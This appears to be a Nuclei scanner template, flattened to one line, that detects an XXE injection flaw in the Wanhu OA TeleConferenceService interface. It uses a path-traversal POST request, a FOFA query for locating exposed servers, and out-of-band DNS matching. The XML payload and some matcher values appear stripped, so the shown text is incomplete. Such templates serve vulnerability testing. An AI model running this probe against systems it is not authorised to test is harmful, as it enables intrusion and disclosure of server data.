id: wanhu-teleconferenceservice-xxe info: name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection author: SleepingBag945 severity: high description: | There is an XXE injection vulnerability in the Wanhu OA TeleConferenceService interface. An attacker can use the vulnerability to continue XXE injection to obtain sensitive information on the server. reference: - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20TeleConferenceService%20XXE%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: app="万户网络-ezOFFICE" tags: wanhu,oa,xxe http: - raw: - | POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1 Host: {{Hostname}} ]> &xxe; matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "" - "" condition: and - type: word part: header words: - "text/xml" # digest: 4b0a00483046022100a136a03abb48fc04d314a73fb584964e8dc2bdc3f0d71815c2209085382cff72022100a1ef2bd0b22a5245cf9e08868f91afc38cc6d6c3386dff0ebae685d25a1d5acc:922c64590222798bb761d5b6d8e72950